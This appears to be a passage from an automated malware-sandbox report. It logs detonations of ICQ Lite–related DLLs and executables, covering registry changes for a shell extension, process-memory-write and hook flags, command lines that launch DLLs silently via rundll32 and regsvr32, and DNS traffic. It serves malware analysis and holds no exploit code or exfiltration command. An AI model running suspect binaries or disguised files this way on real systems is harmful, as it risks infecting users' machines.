| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
111s
Max time network
168s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
119s
Max time network
134s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
115s
Max time network
168s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2584 -ip 2584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
123s
Max time network
135s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 3000 wrote to memory of 3016 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
127s
Max time network
139s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 228
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2640 wrote to memory of 3864 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteSkinUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3864 -ip 3864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 588
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 147.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
